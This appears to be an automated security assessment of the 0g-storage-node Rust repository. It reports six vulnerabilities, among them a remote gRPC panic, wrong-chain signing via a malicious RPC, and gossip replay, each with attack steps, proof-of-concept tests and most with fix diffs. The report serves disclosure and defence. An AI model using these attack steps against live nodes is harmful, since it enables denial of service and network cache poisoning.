KAI Security Assessment: 0g-storage-node
We ran KAI Agent against the 0g-storage-node repository. The automated analysis examined 47 exploit candidates across the Rust-based decentralized storage node implementation, verifying 6 vulnerabilities including 2 High and 2 Medium severity findings with fixes generated and validated for 4 of them.
Executive Summary
| Metric | Value |
|---|---|
| Repository | 0g-storage-node |
| Exploit Candidates | 47 |
| Verified Exploits | 6 |
| Rejected | 4 |
Severity Breakdown
| Severity | Count |
|---|---|
| High | 2 |
| Medium | 2 |
| Unrated | 2 |
Verified Vulnerabilities
[HIGH] Remote gRPC Panic via Missing Proto Fields in SegmentWithProof
Severity: High
Affected File: node/rpc/src/types.rs
Affected Function: impl TryFrom<zgs_grpc_proto::SegmentWithProof> for SegmentWithProof::try_from
Description
gRPC UploadSegmentsByTxSeq can remotely panic the server due to unwrap() on missing SegmentWithProof.root/proof in TryFrom conversion, enabling request-triggered DoS.
Attack Steps
- Connect to the node's gRPC listener (default 0.0.0.0:50051)
- Call ZgsGrpcService/UploadSegmentsByTxSeq with any tx_seq
- In the request, include at least one SegmentWithProof message where the 'root' field is omitted (so it decodes as None in Rust Option), and/or omit the 'proof' field
- Server-side, upload_segments_by_tx_seq converts each proto segment via SegmentWithProof::try_from(grpc_segment)
- The conversion executes grpc_segment.root.unwrap() and grpc_segment.proof.unwrap(), which panics when the field is missing
- Repeat malformed requests to repeatedly trigger panics (request-task DoS; process crash possible depending on panic handling/build settings)
Proof of Concept
#!/usr/bin/env python3
import re
from pathlib import Path
import sys
ROOT = Path(__file__).resolve().parents[1]
types_path = ROOT / "node/rpc/src/types.rs"
impl_path = ROOT / "node/rpc/src/zgs_grpc/impl.rs"
types_src = types_path.read_text(encoding="utf-8")
impl_src = impl_path.read_text(encoding="utf-8")
def must_find(pattern: str, text: str, label: str):
m = re.search(pattern, text, flags=re.MULTILINE)
if not m:
print(f"[FAIL] did not find {label} / pattern: {pattern}")
sys.exit(1)
return m.group(0)
# Primary vulnerable unwraps
hit_root = must_find(r"grpc_segment\.root\.unwrap\(\)", types_src, "grpc_segment.root.unwrap()")
hit_proof = must_find(r"grpc_segment\.proof\.unwrap\(\)", types_src, "grpc_segment.proof.unwrap()")
# Confirm the unwraps are within the expected TryFrom impl for SegmentWithProof
hit_impl_header = must_find(
r"impl\s+TryFrom<zgs_grpc_proto::SegmentWithProof>\s+for\s+SegmentWithProof\s*{",
types_src,
"TryFrom<proto::SegmentWithProof> for SegmentWithProof header",
)
# Affected handler calls try_from and does not catch panics
hit_handler = must_find(
r"async\s+fn\s+upload_segments_by_tx_seq\s*\(",
impl_src,
"upload_segments_by_tx_seq method signature",
)
hit_call = must_find(
r"RpcSegment::try_from\(s\)",
impl_src,
"RpcSegment::try_from(s) call in handler",
)
# Heuristic: ensure there's no catch_unwind in handler file
if "catch_unwind" in impl_src:
print("[WARN] found catch_unwind in impl.rs; manual review needed")
sys.exit(2)
print("[OK] Confirmed unwrap() on optional proto fields in SegmentWithProof::try_from:")
print(" ", hit_root.strip())
print(" ", hit_proof.strip())
print("[OK] Confirmed UploadSegmentsByTxSeq handler calls RpcSegment::try_from(s) without panic catching.")
print(" ", hit_call.strip())
print()
print("Impact: A gRPC client can omit `SegmentWithProof.root` and/or `SegmentWithProof.proof` in")
print("UploadSegmentsByTxSeqRequest.segments; prost decodes omitted message fields as None;")
print("the unwrap() will panic, causing request-triggered DoS (task panic / possible process crash).")
Recommended Fix
diff --git a/node/rpc/src/types.rs b/node/rpc/src/types.rs
index b072cc0..c619dab 100644
--- a/node/rpc/src/types.rs
+++ b/node/rpc/src/types.rs
@@ -129,13 +129,16 @@ impl TryFrom<zgs_grpc_proto::SegmentWithProof> for SegmentWithProof {
type Error = GrpcStatus;
fn try_from(grpc_segment: zgs_grpc_proto::SegmentWithProof) -> Result<Self, GrpcStatus> {
- let root = grpc_segment.root.unwrap().try_into()?;
+ let root = grpc_segment
+ .root
+ .ok_or_else(|| GrpcStatus::invalid_argument("missing field: root"))?
+ .try_into()?;
let data = grpc_segment.data;
// index is u64 in proto, usize in app
let index = grpc_segment.index.try_into().map_err(|_| {
GrpcStatus::invalid_argument(format!("Invalid segment index: {}", grpc_segment.index))
})?;
- let proof = grpc_segment.proof.unwrap().try_into()?;
+ let proof = grpc_segment
+ .proof
+ .ok_or_else(|| GrpcStatus::invalid_argument("missing field: proof"))?
+ .try_into()?;
[HIGH] Chain ID Truncation Enables Wrong-Chain Signing via Malicious RPC
Severity: High
Affected File: node/miner/src/config.rs
Affected Function: make_signing_provider
Description
Miner signs transactions with chain_id taken from the RPC response and truncated (U256->u64 via as_u64), so a malicious/MITM RPC can force wrong-chain signing (persistent submission failure / wasted gas on unintended network).
Attack Steps
- Attacker controls victim miner's JSON-RPC endpoint or performs MITM attack (especially over http://)
- Attacker answers eth_chainId with an unexpected value (e.g., a different chain, or >2^64 to trigger truncation when as_u64() is used)
- Miner constructs LocalWallet with with_chain_id(chain_id.as_u64())
- All submissions are signed for the attacker-chosen chain-id domain, causing invalid signatures/rejected txs on the intended chain, or transactions being broadcast to/paid on an unintended chain served by the attacker RPC
- Miner continuously retries/submits and loses liveness (and possibly funds via fees on the wrong network)
Proof of Concept
// Standalone PoC crate: includes the vulnerable MinerConfig implementation verbatim,
// but provides minimal stand-ins for `storage::config::ShardConfig` and `contract_wrapper::SubmitConfig`
// so we don't need to compile the full workspace (which pulls rocksdb/bindgen).
pub mod storage {
pub mod config {
#[derive(Clone, Copy, Debug, Eq, PartialEq)]
pub struct ShardConfig {
pub shard_id: usize,
pub num_shard: usize,
}
impl Default for ShardConfig {
fn default() -> Self {
Self {
shard_id: 0,
num_shard: 1,
}
}
}
}
}
pub mod contract_wrapper {
#[derive(Clone, Copy, Debug)]
pub struct SubmitConfig {
pub initial_gas_price: Option<u64>,
pub max_gas_price: Option<u64>,
pub max_gas: Option<u64>,
pub gas_increase_factor: Option<u64>,
pub max_retries: Option<usize>,
pub interval_secs: Option<u64>,
}
impl Default for SubmitConfig {
fn default() -> Self {
Self {
initial_gas_price: None,
max_gas_price: None,
max_gas: None,
gas_increase_factor: Some(11),
max_retries: Some(5),
interval_secs: Some(2),
}
}
}
}
// Pull in the vulnerable implementation exactly as-shipped.
include!("../../../node/miner/src/config.rs");
#[cfg(test)]
mod poc_tests {
use super::*;
use std::io::{Read, Write};
use std::net::{TcpListener, TcpStream};
use std::thread;
use std::time::Duration;
/// Minimal HTTP JSON-RPC server that responds only to `eth_chainId`.
/// It returns the attacker-controlled chain id specified.
fn start_mock_rpc(chain_id_hex: &'static str) -> String {
let listener = TcpListener::bind("127.0.0.1:0").expect("bind");
let addr = listener.local_addr().expect("local_addr");
thread::spawn(move || {
for stream in listener.incoming().take(10) {
if let Ok(stream) = stream {
let _ = handle_conn(stream, chain_id_hex);
}
}
});
format!("http://{}", addr)
}
fn handle_conn(mut stream: TcpStream, chain_id_hex: &str) -> Result<(), String> {
stream
.set_read_timeout(Some(Duration::from_millis(500)))
.map_err(|e| format!("set_read_timeout: {e:?}"))?;
// Read request (best-effort).
let mut buf = Vec::with_capacity(8192);
let mut tmp = [0u8; 4096];
loop {
match stream.read(&mut tmp) {
Ok(0) => break,
Ok(n) => {
buf.extend_from_slice(&tmp[..n]);
if buf.windows(4).any(|w| w == b"\r\n\r\n") && buf.len() > 16 {
break;
}
}
Err(_) => break,
}
}
let req = String::from_utf8_lossy(&buf);
// Extract numeric JSON-RPC id if present (ethers uses numeric ids).
let id = extract_jsonrpc_id(&req).unwrap_or_else(|| "1".to_string());
let body = format!(r#"{{"jsonrpc":"2.0","id":{},"result":"{}"}}"#, id, chain_id_hex);
let resp = format!(
"HTTP/1.1 200 OK\r\nContent-Type: application/json\r\nContent-Length: {}\r\nConnection: close\r\n\r\n{}",
body.len(),
body
);
stream
.write_all(resp.as_bytes())
.map_err(|e| format!("write: {e:?}"))?;
Ok(())
}
fn extract_jsonrpc_id(req: &str) -> Option<String> {
let idx = req.find("\"id\"")?;
let after = &req[idx..];
let colon = after.find(':')?;
let mut chars = after[colon + 1..].trim_start().chars();
let mut out = String::new();
for c in &mut chars {
if c.is_ascii_digit() {
out.push(c);
} else {
break;
}
}
if out.is_empty() {
None
} else {
Some(out)
}
}
#[tokio::test]
async fn attacker_controls_wallet_chain_id() {
// Attacker lies about chain-id to force wrong-chain signing domain.
let rpc_url = start_mock_rpc("0x2a"); // 42
let cfg = MinerConfig::new(
None,
Some(H256::from_low_u64_be(1)), // valid secp256k1 secret key (non-zero)
rpc_url,
Address::zero(),
Address::zero(),
0,
1,
1,
ShardConfig::default(),
0,
0,
0,
SubmitConfig::default(),
)
.expect("MinerConfig::new");
let middleware = cfg.make_signing_provider().await.expect("make_signing_provider");
assert_eq!(middleware.signer().chain_id(), 42);
}
#[tokio::test]
async fn overflow_chain_id_panics() {
// On this dependency set, U256::as_u64 panics on overflow.
// Attacker-controlled RPC can crash miner init by returning a >u64 chain id.
let rpc_url = start_mock_rpc("0x10000000000000001"); // 2^64 + 1
let cfg = MinerConfig::new(
None,
Some(H256::from_low_u64_be(1)),
rpc_url,
Address::zero(),
Address::zero(),
0,
1,
1,
ShardConfig::default(),
0,
0,
0,
SubmitConfig::default(),
)
.expect("MinerConfig::new");
let jh = tokio::spawn(async move {
// This should panic inside make_signing_provider when calling chain_id.as_u64().
let _ = cfg.make_signing_provider().await;
});
let join_res = jh.await;
assert!(join_res.is_err(), "task should fail (panic expected)");
assert!(join_res.unwrap_err().is_panic(), "failure should be a panic");
}
}
Recommended Fix
--- a/node/miner/src/config.rs
+++ b/node/miner/src/config.rs
@@ -90,7 +90,12 @@
.map_err(|e| format!("Unable to get chain_id: {:?}", e))?;
let secret_key = SecretKey::from_bytes(self.miner_key.as_ref().into())
.map_err(|e| format!("Cannot parse private key: {:?}", e))?;
- let signer = LocalWallet::from(secret_key).with_chain_id(chain_id.as_u64());
+ let chain_id_u64 = if chain_id > ethers::types::U256::from(u64::MAX) {
+ return Err(format!("chain_id {:?} does not fit into u64", chain_id));
+ } else {
+ chain_id.as_u64()
+ };
+ let signer = LocalWallet::from(secret_key).with_chain_id(chain_id_u64);
let middleware = SignerMiddleware::new(provider, signer);
Ok(middleware)
[MEDIUM] Persistent Crash Loop from Malformed Merkle Node Bytes in FlowStore
Severity: Medium
Affected File: node/storage/src/log_store/flow_store.rs
Affected Function: FlowDBStore::get_node
Description
FlowStore panics on malformed merkle-node bytes read from the DB because it uses try_into().unwrap() and OptionalHash::from_bytes(...).unwrap(), enabling a persistent crash loop if the DB column is poisoned (snapshot import/corruption).
Attack Steps
- Provide or cause the node to load a poisoned DB/snapshot containing invalid values in the
COL_FLOW_MPT_NODEScolumn (wrong length or invalid OptionalHash encoding) - Trigger any code path that calls
FlowDBStore::get_nodefor the poisoned key (normal merkle operations) - The read path executes
v.as_slice().try_into().unwrap()orOptionalHash::from_bytes(...).unwrap(), panics, and the node crashes repeatedly on restart
Proof of Concept
// --- PoC: FlowDBStore::get_node panics on malformed bytes in COL_FLOW_MPT_NODES ---
// This demonstrates a persistent crash loop risk if the DB/snapshot is poisoned with invalid bytes.
use super::flow_store::FlowDBStore;
use crate::log_store::log_manager::{COL_FLOW_MPT_NODES, COL_NUM};
use crate::ZgsKeyValueDB;
use append_merkle::NodeDatabase;
use kvdb_memorydb;
use std::panic::{catch_unwind, AssertUnwindSafe};
use std::sync::Arc;
fn encode_mpt_node_key_test(layer_index: usize, position: usize) -> Vec<u8> {
let mut key = layer_index.to_be_bytes().to_vec();
key.extend_from_slice(&position.to_be_bytes());
key
}
#[test]
fn poc_flowstore_get_node_panics_on_short_value() {
// Arrange: create in-memory kvdb and poison the COL_FLOW_MPT_NODES value with wrong length.
let db = Arc::new(kvdb_memorydb::create(COL_NUM));
let store = FlowDBStore::new(db.clone());
let key = encode_mpt_node_key_test(1, 2);
db.put(COL_FLOW_MPT_NODES, &key, b"too_short")
.expect("db put should succeed");
// Act + Assert: get_node panics due to `try_into().unwrap()` on a non-33-byte slice.
let panicked = catch_unwind(AssertUnwindSafe(|| {
let _ = store.get_node(1, 2);
}))
.is_err();
assert!(panicked, "expected get_node to panic on short DB value");
}
#[test]
fn poc_flowstore_get_node_panics_on_invalid_optionalhash_flag() {
// Arrange: poison DB with correct length (33) but invalid OptionalHash flag byte.
let db = Arc::new(kvdb_memorydb::create(COL_NUM));
let store = FlowDBStore::new(db.clone());
let key = encode_mpt_node_key_test(3, 4);
let mut v = [0u8; 33];
v[0] = 2; // invalid flag (must be 0 or 1 per OptionalHash::from_bytes)
db.put(COL_FLOW_MPT_NODES, &key, &v[..])
.expect("db put should succeed");
// Act + Assert: get_node panics due to `OptionalHash::from_bytes(...).unwrap()`.
let panicked = catch_unwind(AssertUnwindSafe(|| {
let _ = store.get_node(3, 4);
}))
.is_err();
assert!(panicked, "expected get_node to panic on invalid OptionalHash encoding");
}
Recommended Fix
--- a/node/storage/src/log_store/flow_store.rs
+++ b/node/storage/src/log_store/flow_store.rs
@@ -598,10 +598,33 @@
impl NodeDatabase<OptionalHash> for FlowDBStore {
fn get_node(&self, layer: usize, pos: usize) -> Result<Option<OptionalHash>> {
- Ok(self
+ let raw = self
.kvdb
- .get(COL_FLOW_MPT_NODES, &encode_mpt_node_key(layer, pos))?
- .map(|v| OptionalHash::from_bytes(v.as_slice().try_into().unwrap()).unwrap()))
+ .get(COL_FLOW_MPT_NODES, &encode_mpt_node_key(layer, pos))?;
+ let Some(v) = raw else {
+ return Ok(None);
+ };
+
+ let bytes: &[u8; 33] = match v.as_slice().try_into() {
+ Ok(b) => b,
+ Err(_) => {
+ error!(
+ layer,
+ pos,
+ len = v.len(),
+ "invalid merkle node byte length in DB (expected 33)"
+ );
+ return Ok(None);
+ }
+ };
+
+ match OptionalHash::from_bytes(bytes) {
+ Ok(node) => Ok(Some(node)),
+ Err(e) => {
+ error!(layer, pos, err = %e, "invalid merkle node bytes in DB");
+ Ok(None)
+ }
+ }
}
fn get_layer_size(&self, layer: usize) -> Result<Option<usize>> {
[MEDIUM] AnnounceFile Replay Attack via Unsigned resend_timestamp
Severity: Medium
Affected File: node/router/src/libp2p_event_handler.rs
Affected Function: construct_announce_file_message + on_announce_file
Description
AnnounceFile freshness uses resend_timestamp (apparently not covered by the signature) instead of the signed inner timestamp, allowing indefinite replay of stale-but-once-valid announcements (cache poisoning / routing degradation).
Attack Steps
- Attacker can observe any valid
SignedAnnounceFileon pubsub (or otherwise obtain one) and can republish gossipsub messages - Attacker records a valid
SignedAnnounceFilethat would normally age out - After it becomes stale, attacker republishes the same signed payload but sets
resend_timestamp = now()(the code setssigned.resend_timestamp = timestampafter signing, implying it is mutable and not signature-protected) - Victim verifies signature on the signed portion and checks freshness using
msg.resend_timestamp, so the replay passes the timeout window - Victim accepts and inserts it into
file_location_cache, keeping stale locations alive and repeatedly steering lookups/connection attempts toward attacker-chosen or dead endpoints - Attacker repeats to keep poisoned entries perpetually 'fresh' across the network
Proof of Concept
#[tokio::test]
async fn test_on_pubsub_announce_file_replay_by_bumping_resend_timestamp() {
let mut ctx = Context::default();
let handler = ctx.new_handler();
let (alice, bob) = (PeerId::random(), PeerId::random());
let id = MessageId::new(b"dummy message");
let tx = TxID::random_hash(4242);
// Create an announcement with an *old* inner timestamp that should be stale.
let old_timestamp =
timestamp_now() - PUBSUB_TIMEOUT_NETWORK.num_seconds() as u32 - 100;
let peer_id = *ctx.network_globals.peer_id.read();
let addr = ctx
.network_globals
.listen_multiaddrs
.read()
.first()
.unwrap()
.clone();
let timed = TimedMessage {
inner: network::types::AnnounceFile {
tx_ids: vec![tx],
shard_config: handler.store.get_store().get_shard_config().into(),
peer_id: peer_id.into(),
at: addr.into(),
},
timestamp: old_timestamp,
};
// Sign message (signature covers `timed`, i.e., the inner timestamp), but NOT resend_timestamp.
let mut signed = network::types::SignedMessage::sign_message(timed, &ctx.keypair).unwrap();
// Case 1: stale resend_timestamp => ignored.
signed.resend_timestamp = old_timestamp;
let message = PubsubMessage::AnnounceFile(vec![signed.clone()]);
let res = handler.on_pubsub_message(alice, bob, &id, message).await;
assert!(matches!(res, MessageAcceptance::Ignore));
assert_eq!(ctx.file_location_cache.get_all(tx).len(), 0);
assert!(matches!(ctx.sync_recv.try_recv(), Err(TryRecvError::Empty)));
// Case 2: replay exact same signed payload, only bump resend_timestamp => accepted.
signed.resend_timestamp = timestamp_now();
let message = PubsubMessage::AnnounceFile(vec![signed]);
let res = handler.on_pubsub_message(alice, bob, &id, message).await;
// This demonstrates the vulnerability: stale message becomes acceptable by changing only resend_timestamp.
assert!(matches!(res, MessageAcceptance::Accept));
// ensure notify to sync layer
match ctx.sync_recv.try_recv() {
Ok(Notification(SyncMessage::AnnounceFileGossip { tx_id, peer_id: got_peer_id, addr: got_addr })) => {
assert_eq!(tx_id, tx);
assert_eq!(got_peer_id, peer_id);
assert_eq!(got_addr, *ctx.network_globals.listen_multiaddrs.read().first().unwrap());
}
Ok(_) => panic!("Unexpected sync message type received"),
Err(e) => panic!("No sync message received: {:?}", e),
}
// ensure cache updated
assert_eq!(ctx.file_location_cache.get_all(tx).len(), 1);
}
Recommended Fix
diff --git a/tmp/orig_snap/libp2p_event_handler.rs b/node/router/src/libp2p_event_handler.rs
index 1d6bcd1..85dcb8b 100644
--- a/tmp/orig_snap/libp2p_event_handler.rs
+++ b/node/router/src/libp2p_event_handler.rs
@@ -806,6 +806,20 @@ impl Libp2pEventHandler {
Err(_) => return MessageAcceptance::Reject,
};
+ // verify signed timestamp (prevents replay-by-bumping resend_timestamp)
+ let signed_d = duration_since(
+ msg.inner.timestamp,
+ metrics::LIBP2P_HANDLE_PUBSUB_ANNOUNCE_FILE_LATENCY.clone(),
+ );
+ if signed_d < TOLERABLE_DRIFT.neg() || signed_d > *PUBSUB_TIMEOUT_NETWORK {
+ debug!(
+ ?signed_d,
+ %propagation_source,
+ "Invalid signed timestamp, ignoring AnnounceFile message"
+ );
+ metrics::LIBP2P_HANDLE_PUBSUB_ANNOUNCE_FILE_TIMEOUT.mark(1);
+ return MessageAcceptance::Ignore;
+ }
// propagate gossip to peers
let d = duration_since(
msg.resend_timestamp,
[UNRATED] Sealer Main Loop CPU Hot-Spin
Severity: Unrated
Affected File: node/miner/src/sealer.rs
Affected Function: start loop + seal_iteration
Description
Sealer main loop can hot-spin at 100% CPU when seal_iteration() returns Ok(true) because throttling is never reset in that branch, enabling sustained local/remote-influenced DoS.
Attack Steps
- Victim runs the miner sealer; attacker can (directly or indirectly) influence the task source backing
self.store.pull_seal_chunk(...)(e.g., via whatever network→store ingestion exists) and/or can influence the RPC/context readiness sofetch_context()often returnsOk(None)quickly - Attacker causes the victim store to continuously report a non-empty set of seal tasks (so
seal_iteration()does not take theOk(false)path that resets the throttle) - Attacker simultaneously causes each task to be non-sealable (e.g., context is 'not ready' so
fetch_context(seal_index)returnsOk(None)), making the loopcontinuefor each task without producing work seal_iteration()still returnsOk(true)(tasks existed), even ifanswersis empty- In the
startloop, theOk(true)branch does not resetdb_checker_throttle, sodb_checker_throttle.is_elapsed()remains true - The outer loop immediately runs another iteration with no sleep/backoff, producing a tight loop that burns CPU (and can also cause repeated DB/RPC access depending on the skipped path)
Proof of Concept
/// PoC unit test (add to bottom of `node/miner/src/sealer.rs`)
///
/// Confirms hot-spin: if `seal_iteration()` keeps returning Ok(true) (tasks exist) but produces no
/// answers (context not ready => fetch_context returns Ok(None)), the `start()` loop never resets
/// db_checker_throttle in the Ok(true) branch and will re-run sealing iterations as fast as possible.
#[cfg(test)]
mod hot_spin_tests {
use super::*;
use std::str::FromStr;
use std::sync::{atomic::{AtomicUsize, Ordering}, Arc};
use append_merkle::OptionalHash;
use ethers::prelude::{Http, Provider, RetryClient, RetryClientBuilder};
use ethers::providers::HttpRateLimitRetryPolicy;
use ethers::types::Address;
use shared_types::{
Chunk, ChunkArray, ChunkArrayWithProof, ChunkWithProof, DataRoot, FlowRangeProof,
Transaction,
};
use storage::config::ShardConfig;
use storage::error::Result;
use storage::log_store::config::{ConfigTx, Configurable};
use storage::log_store::load_chunk::EntryBatch;
use storage::log_store::tx_store::{BlockHashAndSubmissionIndex, TxStatus};
use storage::log_store::{LogStoreChunkRead, LogStoreChunkWrite, LogStoreRead, LogStoreWrite, MineLoadChunk, SealAnswer, SealTask};
/// Dummy synchronous store used underneath `storage_async::Store`.
///
/// Behavior:
/// - `pull_seal_chunk(..)` always returns a non-empty task list.
/// - `submit_seal_result(..)` is a no-op.
///
/// This forces `seal_iteration()` to return Ok(true) every time while `fetch_context()` will
/// return Ok(None) quickly (because Sealer.last_context_flow_length = 0), creating empty answers.
#[derive(Default)]
struct DummyLogStore {
pull_calls: AtomicUsize,
submit_calls: AtomicUsize,
shard_config: ShardConfig,
}
#[test]
fn sealer_start_loop_hot_spins_when_seal_iteration_ok_true() {
// Use the task_executor crate's built-in test runtime wrapper.
let tr = task_executor::test_utils::TestRuntime::default();
let dummy: Arc<DummyLogStore> = Arc::new(DummyLogStore::default());
let dummy_for_assert = dummy.clone();
// Run everything inside the TestRuntime's tokio runtime.
tr.runtime.block_on(async move {
// storage_async::Store wraps the synchronous log-store and uses TaskExecutor to offload work.
let log_store: Arc<dyn storage::log_store::Store> = dummy.clone();
let store = Arc::new(storage_async::Store::new(log_store, tr.task_executor.clone()));
// Provider that will fail quickly; we keep last_context_flow_length=0 so fetch_context short-circuits
// and does not hit the network in seal_iteration().
let http = Http::from_str("http://127.0.0.1:1").expect("valid URL");
let provider: Arc<Provider<RetryClient<Http>>> = Arc::new(Provider::new(
RetryClientBuilder::default()
.rate_limit_retries(0)
.timeout_retries(0)
.initial_backoff(Duration::from_millis(0))
.build(http, Box::new(HttpRateLimitRetryPolicy)),
));
let flow_contract = ZgsFlow::new(Address::zero(), provider);
let sealer = Sealer {
flow_contract,
store,
context_cache: Default::default(),
last_context_flow_length: 0,
miner_id: H256::zero(),
};
let handle = tokio::spawn(async move {
sealer.start().await;
});
// Let it run briefly.
tokio::time::sleep(Duration::from_millis(200)).await;
handle.abort();
// If db_checker_throttle were reset on Ok(true), we'd see ~0-1 pulls in 200ms.
// Because it is *not* reset, it hot-spins and we observe many pulls.
let pulls = dummy_for_assert.pull_count();
assert!(pulls > 20, "expected hot spin (many pull_seal_chunk calls); got pulls={pulls}");
});
}
}
Recommended Fix
No suggested diff provided for this vulnerability.
[UNRATED] Sync Manager Panic on Shutdown Channel Error
Severity: Unrated
Affected File: node/log_entry_sync/src/sync_manager/mod.rs
Affected Function: spawn (run_and_log error callback)
Description
Sync manager error-handling path panics because it calls shutdown_sender.try_send(...).expect("shutdown send error") on a possibly closed/full channel, turning a recoverable provider-induced failure into a crash.
Attack Steps
- Induce a log-sync failure by making the configured provider return errors/timeouts for required calls (e.g.,
eth_getLogs/eth_getBlockByNumber) - Ensure the shutdown receiver is dropped or the bounded shutdown channel is full (e.g., concurrent shutdown already in progress, or repeated failures)
- When the error callback runs,
try_sendreturns Err and.expect("shutdown send error")panics, crashing the sync task/process
Proof of Concept
// poc_shutdown_expect/Cargo.toml
[package]
name = "poc_shutdown_expect"
version = "0.1.0"
edition = "2021"
[dependencies]
anyhow = "1"
futures = "0.3"
tokio = { version = "1", features = ["macros", "rt"] }
task_executor = { path = "../common/task_executor" }
[workspace]
// poc_shutdown_expect/src/lib.rs
use std::fmt::Debug;
use std::future::Future;
/// Copy of the `run_and_log` helper from:
/// node/log_entry_sync/src/sync_manager/mod.rs
async fn run_and_log<R, E>(
mut on_error: impl FnMut(),
f: impl Future<Output = std::result::Result<R, E>> + Send,
) -> Option<R>
where
E: Debug,
{
match f.await {
Err(_e) => {
// In production this logs and then runs the error callback.
on_error();
None
}
Ok(r) => Some(r),
}
}
#[cfg(test)]
mod tests {
use super::*;
use anyhow::anyhow;
use futures::channel::mpsc;
use task_executor::ShutdownReason;
/// Confirms the vulnerable pattern exists in the target file.
#[test]
fn source_contains_expect_on_shutdown_send() {
// Path relative to this PoC crate.
const SRC: &str = include_str!("../../node/log_entry_sync/src/sync_manager/mod.rs");
assert!(
SRC.contains(r#".expect("shutdown send error")"#),
"target file no longer contains `.expect(\"shutdown send error\")`"
);
assert!(
SRC.contains("try_send(ShutdownReason::Failure(\"log sync failure\"))")
|| SRC.contains("try_send(ShutdownReason::Failure(\"log sync failure\"))".replace("\\", "").as_str()),
"target file no longer contains try_send(Failure(\"log sync failure\")) pattern"
);
}
/// Runnable crash reproduction: if the shutdown receiver is dropped/closed,
/// `try_send(..).expect("shutdown send error")` panics.
#[tokio::test]
#[should_panic(expected = "shutdown send error")]
async fn panic_on_closed_shutdown_channel() {
let (mut shutdown_sender, shutdown_receiver) = mpsc::channel::<ShutdownReason>(1);
// Simulate shutdown already underway: receiver is gone, channel is closed.
drop(shutdown_receiver);
let _ = run_and_log(
move || {
shutdown_sender
.try_send(ShutdownReason::Failure("log sync failure"))
.expect("shutdown send error")
},
async { Err::<(), _>(anyhow!("provider induced failure")) },
)
.await;
}
}
Recommended Fix
No suggested diff provided for this vulnerability.
This assessment was conducted using KAI's automated security analysis platform. Each verified vulnerability includes proof-of-concept code demonstrating exploitability and recommended fixes to address the identified security issues.



